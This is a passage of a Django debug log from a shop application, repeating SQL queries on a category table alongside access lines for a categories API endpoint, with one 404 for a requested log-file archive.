"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:32:30,843 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:32:30,845 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:32:30,848 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:32:30] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 09:34:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 09:37:42,809 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:37:42,814 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:37:42,817 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:37:42,819 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:37:42,823 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:37:42,826 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:37:42,829 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:37:42,833 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:37:42,836 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:37:42,840 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:37:42,842 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:37:42] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 09:39:07] "GET / HTTP/1.0" 302 0 Not Found: /error.log-20191123.gz [09/Dec/2019 09:39:30] "GET /error.log-20191123.gz HTTP/1.0" 404 6657 DEBUG 2019-12-09 09:40:30,559 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:40:30,564 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:40:30,568 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:40:30,572 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:40:30,574 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:40:30,577 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:40:30,579 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:40:30,581 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:40:30,584 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:40:30,586 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:40:30,589 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:40:30] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:40:36,986 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:40:36,991 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:40:36,993 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:40:36,996 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:40:36,998 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:40:37,000 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:40:37,003 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:40:37,005 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:40:37,007 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:40:37,009 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:40:37,011 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:40:37] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:41:00,794 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:41:00,799 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:41:00,801 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:41:00,803 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:41:00,806 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:41:00,808 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:41:00,810 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:41:00,812 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:41:00,814 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:41:00,817 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:41:00,819 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:41:00] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:41:01,290 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:41:01,294 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:41:01,297 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:41:01,299 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:41:01,301 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:41:01,303 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:41:01,305 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:41:01,307 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:41:01,310 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:41:01,312 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:41:01,314 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:41:01] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:42:59,927 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:42:59,934 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:42:59,937 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:42:59,941 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:42:59,945 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:42:59,948 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:42:59,951 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:42:59,953 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:42:59,956 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:42:59,958 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:42:59,960 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 